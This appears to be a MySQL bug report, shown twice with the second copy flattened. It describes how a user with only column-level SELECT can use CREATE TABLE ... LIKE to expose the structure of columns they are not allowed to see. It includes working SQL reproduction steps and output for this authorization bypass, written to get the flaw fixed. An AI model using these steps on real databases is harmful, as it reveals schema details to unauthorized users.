Description:
In current MySQL, a user with CREATE privilege as well as SELECT privileges on only a specific column of a source table can execute CREATE TABLE ... LIKE to create a copy of the entire table structure.
This allows the user to discover the existence and data types of columns they are not authorized to access.
How to repeat:
-- Login as user root
CREATE TABLE ori (c1 INT, c2 INT);
CREATE USER foo;
-- Grant table level create, and column level select
GRANT CREATE ON new TO foo;
GRANT SELECT(c1) ON ori TO foo;
-- Login as user foo
CREATE TABLE new LIKE ori;
SHOW CREATE TABLE new;
Expected Result:
The CREATE TABLE ... LIKE statement should fail with an access denied error regarding column c2, similar to:
"SELECT command denied to user 'foo'@'...' for column 'c2' in table 'ori'"
Actual Result:
The query succeeds ("Query OK"). The user can then run "SHOW CREATE TABLE new" to see the definition of c2, which they should not have access to.
mysql> CREATE TABLE new LIKE ori;
Query OK, 0 rows affected (0.003 sec)
mysql> SHOW CREATE TABLE new;
+-------+------------------------------------------------------------------------------------------------------------------------------------------+
| Table | Create Table |
+-------+------------------------------------------------------------------------------------------------------------------------------------------+
| new | CREATE TABLE `new` (
`c1` int DEFAULT NULL,
`c2` int DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci |
+-------+------------------------------------------------------------------------------------------------------------------------------------------+
1 row in set (0.000 sec)
© 2026, Oracle Corporation and/or its affiliates
Description: In current MySQL, a user with CREATE privilege as well as SELECT privileges on only a specific column of a source table can execute CREATE TABLE ... LIKE to create a copy of the entire table structure. This allows the user to discover the existence and data types of columns they are not authorized to access. How to repeat: -- Login as user root CREATE TABLE ori (c1 INT, c2 INT); CREATE USER foo; -- Grant table level create, and column level select GRANT CREATE ON new TO foo; GRANT SELECT(c1) ON ori TO foo; -- Login as user foo CREATE TABLE new LIKE ori; SHOW CREATE TABLE new; Expected Result: The CREATE TABLE ... LIKE statement should fail with an access denied error regarding column c2, similar to: "SELECT command denied to user 'foo'@'...' for column 'c2' in table 'ori'" Actual Result: The query succeeds ("Query OK"). The user can then run "SHOW CREATE TABLE new" to see the definition of c2, which they should not have access to. mysql> CREATE TABLE new LIKE ori; Query OK, 0 rows affected (0.003 sec) mysql> SHOW CREATE TABLE new; +-------+------------------------------------------------------------------------------------------------------------------------------------------+ | Table | Create Table | +-------+------------------------------------------------------------------------------------------------------------------------------------------+ | new | CREATE TABLE `new` ( `c1` int DEFAULT NULL, `c2` int DEFAULT NULL ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci | +-------+------------------------------------------------------------------------------------------------------------------------------------------+ 1 row in set (0.000 sec)